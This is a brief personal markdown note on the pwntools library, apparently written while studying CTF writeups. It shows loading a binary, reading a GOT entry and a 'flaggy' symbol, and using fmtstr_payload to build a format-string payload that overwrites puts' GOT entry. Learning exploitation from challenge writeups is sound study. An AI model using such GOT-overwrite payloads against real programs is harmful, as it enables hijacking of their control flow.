pwntools.md

Stuff I learned about pwntool while reading writeups.

• Basic Setup

from pwn import *

elf = ELF("./binary")
p = elf.process()

• Inbuilt feature of the pwntools ELF class to make getting the location of puts' GOT entry and the some X function easy.

puts_got = elf.got["puts"]
flaggy_address = elf.symbols["flaggy"]

• The fmtstr_payload takes in two parameters. The first is the offset at which you read the start of the buffer and second parameter is a dictionary; the keys are where you wish to write to, and the values are what you want to write there.

payload = fmtstr_payload(4, {puts_got : flaggy_address})
p.sendline(payload)